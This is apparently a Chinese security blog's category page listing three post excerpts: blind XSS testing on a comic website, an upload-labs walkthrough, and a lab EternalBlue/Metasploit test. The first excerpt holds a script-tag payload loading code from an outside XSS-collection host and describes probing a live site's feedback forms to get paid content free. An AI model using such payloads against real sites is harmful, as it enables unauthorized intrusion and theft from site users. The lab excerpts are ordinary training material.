![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 63
Andy Noel
这个作者很懒,什么都没留下…
展开
-
第一次实战:XX漫画的XSS盲打
记一次实战:XX漫画的XSS盲打XSS盲打盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊投诉窗口啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。一句话,就是干,使劲干。Interesting的发现看的王X洋是血脉喷张、欲罢不能。看着看着居然要充值,这不好使,师哥告诉过我们:“要白嫖。”随后让我们点开问题反馈XSS payload<sCRiPt sRC=https://xssaq.com/rHOw><原创 2021-03-26 20:28:26 · 1749 阅读 · 0 评论 -
upload-labs通关记录
upload-labs源码地址upload-labs(github)PASS-1 JS检查直接BurpSuite抓包改包将上传的图片????后缀由图片jpg、png等改为php脚本,然后上传即可PASS-2 type修改原创 2021-03-17 20:36:20 · 127 阅读 · 0 评论 -
EternalBlue永恒之蓝渗透测试
Eternal Blue(永恒之蓝)-ms17-010渗透测试第一次做的渗透测试,也是第一次去写博客,还望各位师傅多多指正 :)工具1.靶机系统 window7 开放445以及139端口2.kali-Linux虚拟机注意保证靶机与主机IP位于同一网段(可用ping命令进行检测)0x01 更新metasploit在kali终端输入msfconsole然后输入apt-get install metaspolit-framework(要在root权限下,若不在,记得在命令前加入sudo,记得输入密原创 2021-03-05 18:47:46 · 517 阅读 · 0 评论